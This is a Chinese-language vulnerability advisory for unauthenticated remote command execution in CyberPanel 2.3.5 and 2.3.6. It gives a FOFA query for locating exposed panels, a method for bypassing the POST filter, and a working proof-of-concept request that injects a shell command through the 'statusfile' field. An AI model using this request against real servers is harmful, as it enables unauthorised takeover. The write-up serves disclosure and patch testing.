0x01 产品描述:
CyberPanel是一个开源的Web控制面板,它提供了一个用户友好的界面,用于管理网站、电子邮件、数据库、FTP账户等。CyberPanel旨在简化网站管理任务,使非技术用户也能轻松管理自己的在线资源。
0x02 漏洞描述:
该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤,未授权的攻击者可以通过此接口执行任意命令获取服务器权限。
0x03 影响版本:
CyberPanel v2.3.5
CyberPanel v2.3.6
0x04 搜索语句:
Fofa:app="CyberPanel"
0x05 漏洞复现:
由于CyberCP/secMiddleware.py中对POST请求存在过滤,因此我们可以使用其他请求方式实现绕过,如:GET/OPTIONS/PUT等
GET /dataBases/upgrademysqlstatus HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close
{"statusfile":"/dev/null; id; #"}
0x06 修复建议:
官方已在V2.3.7版本修复